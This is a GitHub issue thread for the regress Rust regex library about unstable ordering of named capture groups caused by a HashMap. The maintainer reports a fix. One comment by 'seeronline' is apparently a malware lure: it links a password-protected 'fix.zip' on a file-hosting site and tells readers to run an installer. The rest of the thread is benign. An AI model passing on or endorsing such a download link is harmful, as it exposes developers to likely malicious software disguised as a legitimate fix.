### ISSUE TITLE
Stable ordering of `named_group_indices`

### ISSUE THREAD

**Issue by kaleidawave** [ridiculousfish/regress#96]
Hey 👋

Using this library in one of my projects and it is great!

However there is one very small slight issue that prevents it being 1:1 with ECMAScript.

![image](https://github.com/user-attachments/assets/1e6e5052-a715-489d-861d-109ebd76d9dd)

I think this occurs because the parser uses a `HashMap` for groups. HashMaps have no order and have randomised order between runs. 

I think it is quite a simple fix though. The two uses of `HashMap` could be replaced with `Vec<(K, V)>`. This would guarantee order. It should be quite simple to replace any `.get`s with `.find_map` and because there shouldn't be many named groups it should be fine.

https://github.com/ridiculousfish/regress/blob/9f39399b0e61bee0602c791df8be468e00738100/src/parse.rs#L391

https://github.com/ridiculousfish/regress/blob/9f39399b0e61bee0602c791df8be468e00738100/src/insn.rs#L188

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ridiculousfish** [comment]
Fixed in 96f36dc9cca245011bba73fe54631b6513b36db8. Thanks for filing!

**Comment by kaleidawave** [comment]
Thanks for the change!
